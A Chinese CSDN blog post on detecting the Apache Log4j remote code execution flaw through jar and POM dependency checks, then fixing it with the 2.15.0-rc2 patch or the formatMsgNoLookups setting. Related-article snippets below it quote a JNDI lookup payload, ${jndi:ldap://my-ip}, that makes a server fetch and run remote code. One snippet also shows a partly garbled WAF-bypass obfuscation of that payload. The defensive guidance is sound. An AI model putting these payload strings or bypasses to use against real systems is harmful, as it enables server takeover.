Apache Log4j 远程代码执行漏洞自查以及修复

最新推荐文章于 2024-07-08 02:05:06 发布
最新推荐文章于 2024-07-08 02:05:06 发布
阅读量1.7k 收藏 2
点赞数 1
分类专栏: Java和Jvm 文章标签: apache java 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zsj777/article/details/121865213
版权
本文介绍了如何自查Apache Log4j的远程代码执行漏洞,包括检查是否存在org/apache/logging/log4j相关包,以及确认POM文件的依赖。如果发现存在漏洞,可以采取官方发布的补丁或临时解决方案,如设置特定的JVM参数和环境变量来阻止漏洞利用。
摘要由CSDN通过智能技术生成

1、人工检测

 jar解压后是否存在org/apache/logging/log4j相关路径结构,判断是否使用了存在漏洞的组件,若存在相关Java程序包,则很可能存在该漏洞。

应用程序能引用 org.apache.logging.log4j的包,很大概率存在漏洞

如果应用程序引用了 log4j-core-2.xx.xx.jar  或 log4j-api-2.xx.x.jar  很大概率存在漏洞。

如果pom文件引用了以下

<!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core -->
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.xx.x</version>
</dependency>


<!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api -->
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-api</artifactId>
    <version>2.xx.xx</version>
</dependency>

也是存在漏洞。

修复方法:

官方补丁

https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

临时解决方案

1. 设置jvm参数 “-Dlog4j2.formatMsgNoLookups=true”

2. 设置“log4j2.formatMsgNoLookups=True”

3. 系统环境变量“FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS”设置为“true”

非ban必选
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Log4j 严重漏洞修最新修复方案参考
AK774S的博客
05-10 818
缓解方式1:接入安全产品 ============ 第一时间上WAF规则、RASP拦截等措施,给修复争取时间。 但是也要注意一些静态规则上的绕过,log4j 支持的写法比较多,有非常多绕过姿势。比如: KaTeX parse error: Expected '}', got 'EOF' at end of input: {{lower:j}upper:n{upper:n}upper:n{lower:d}upper:i:{upper:i}:upper:i:{lower:r}m${lower:i}}😕 《一线.
springboot启动报错
aaaaaaaaaaaaam的博客
06-26 258
Log4j2 could not find a logging implementation 添加maven依赖 org.apache.logging.log4j log4j-core 2.10.0 org.apache.logging.log4j log4j-api 2.10.0
Log4j2远程代码执行漏洞
最新发布
2301_82000839的博客
07-08 950
log4j2漏洞java应用常见开源日志库,是一个就Java的日志记录工具Apache Log4j2中存在JNDI注入漏洞,主要原理是利用log4j2的日志输出JNDI远程对象时,调用远程对象没做检查导致,程序将用户输入的数据进行日志记录时即可触发该漏洞并可在目标服务器上执行任意代码。该漏洞利用过程需要找到一个能触发远程加载并应用配置的输入点,迫使服务器远程加载和修改配置的前提下使目标系统通过JNDI远程获取数据库源,触发攻击者的恶意代码
java.lang.NoClassDefFoundError: org/apache/commons/io/output/UnsynchronizedByteArrayOutputStream
qq_34254090的博客
01-25 1万+
java.lang.NoClassDefFoundError: org/apache/commons/io/output/UnsynchronizedByteArrayOutputStream 文件输出时报出异常,如下: java.lang.NoClassDefFoundError: org/apache/commons/io/output/UnsynchronizedByteArrayOutputStream at com.primeton.das.common.util.PoiExcelUtils.w
java.lang.NoSuchMethodError: org.apache.logging.log4j.Logger.atTrace()Lorg/apache/logging/log4j/LogB
qq_38978882的博客
07-28 1721
使用poi-ooxml报java.lang.NoSuchMethodError
Spring问题:java.lang.ClassNotFoundException: org.apache.http.pool.AbstractConnPool$4
xinyuan2018的博客
03-22 8260
org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'indexService': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory...
Apache log4j远程代码执行漏洞复现
qq_46162550的博客
05-11 1803
Apache log4j远程代码执行漏洞复现(1) 漏洞原理:(2) 漏洞复现环境:(3) 漏洞复现过程: (1) 漏洞原理: Apache Log4j2 中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即当log4j打印的日志内容中包含${jndi:ldap://my-ip}时,lookup会将jndi注入可执行语句执行,程序会通过ldap协议访问my-ip这个地址,然后my-ip就会返回一个包含java代码的class文件的地址,然后程序再通过返回的地址下载class文件并执行,从而达成漏
Apache Log4j 2 远程代码执行漏洞详解
SimpleAstronaut的博客
12-11 1万+
Apache Log4j2 远程代码执行漏洞的详细信息已被披露,而经过分析,本次 Apache Log4j 远程代码执行漏洞,正是由于组件存在 Java JNDI 注入漏洞:当程序将用户输入的数据记入日志时,攻击者通过构造特殊请求,来触发 Apache Log4j2 中的远程代码执行漏洞,从而利用此漏洞在目标服务器上执行任意代码
漏洞环境搭建+复现】CVE-2021-44228 Apache Log4j 远程代码执行
LJW_IIE的博客
02-15 3474
CVE-2021-44228 Apache Log4j 远程代码执行漏洞环境搭建+验证1 Apache Log4j1.1 log4j的简介1.2 log4j漏洞危害1.3 影响范围2 漏洞环境搭建2.1 工具2.2 靶机搭建2.3 漏洞利用2.3.1 构建POC代码2.3.2 测试3 修复建议 1 Apache Log4j 1.1 log4j的简介 Log4jApache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、
Spring框架及Log4j远程代码执行漏洞影响力分析
weixin_49832675的博客
05-19 390
Scantist SCA已升级数据库并支持对Spring框架及Log4j远程代码执行漏洞利用攻击的监测,同时提供修复方案及建议。
漏洞处置方案】Apache Log4j2远程代码执行漏洞&对外技术支持服务
weixin_40418457的博客
12-10 3577
昨日,Apache Log4j2 成为知名漏洞,其危害性使得该漏洞吸引了安全圈所有人的目光。火线安全为防止其继续扩大影响范围,特发布针对该漏洞的处置方案。 漏洞描述 Apache Log4j 2是对Log4j的升级,它比其前身Log4j 1.x提供了重大改进,并提供了Logback中可用的许多改进,被广泛应用于业务系统开发,用以记录程序输入输出日志信息。是目前较为优秀的Java日志框架。由于Apache Log4j2某些功能存在递归解析功能,攻击者可通过构造指定的恶意请求,触发远程代码执行从而获取服务器权限
java.lang.NoSuchMethodError: org.apache.log4j.Category.log
gris的专栏
01-13 7781
<br /> 启动tomcat时报错:java.lang.NoSuchMethodError: org.apache.log4j.Category.log(Ljava/lang/String;Lorg/apache/log4j/Level;Ljava/lang/Object;Ljava/lang/Throwable;)V at org.apache.commons.logging.impl.Log4JCategoryLog.error(Log4JCategoryLog.java:149)开始一直以为是
Log4j漏洞修复方案
一颗学徒
12-13 4643
Log4j漏洞修复方案
java.lang.NoSuchMethodError: org.apache.log4j.Logger.isTraceEnabled()Z错误
热门推荐
璐璐的专栏
06-06 1万+
008-8-21 13:22:26 org.apache.catalina.core.StandardWrapperValve invoke 严重: Servlet.service() for servlet jsp threw exception java.lang.NoSuchMethodError: org.apache.log4j.Logger.isTraceEnabled()Z
Web网络安全-----Log4j高危漏洞原理及修复
qq_51690690的博客
07-27 1万+
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。提示:以下是本篇文章正文内容,下面案例可供参考。
java.lang.NoSuchMethodError: org.apache.logging.log4j.Logger.atDebug()Lorg/apache/logging/log4j/LogB
qq_25775675的博客
08-31 1万+
Exception in thread "main" java.lang.NoSuchMethodError: org.apache.logging.log4j.Logger.atDebug()Lorg/apache/logging/log4j/LogBuilder;
【渗透测试】log4j漏洞复现和漏洞修复方案
Yb528970805的博客
09-16 1987
2021年12 月 10 日凌晨,Apache 开源项目 Log4j远程代码执行漏洞细节被公开,由于 Log4j 的广泛使用,该漏洞一旦被攻击者利用会造成严重危害。Apache Log4j 2.x <= 2.14.1 版本均回会受到影响。Log4j 是一款开源 Java 日志记录工具。Log4j 2 是对 Log4j 的重大升级,此次漏洞的出现,正是由用于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。
处理,Apache Log4j 远程代码执行漏洞 工作
03-07
你好,关于处理 Apache Log4j 远程代码执行漏洞的工作,我们建议及时升级 Log4j 版本,或者禁用 Log4j,以保障系统安全。同时,也需要加强对系统漏洞的监测和防范,及时修复漏洞,确保系统安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

非ban必选

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值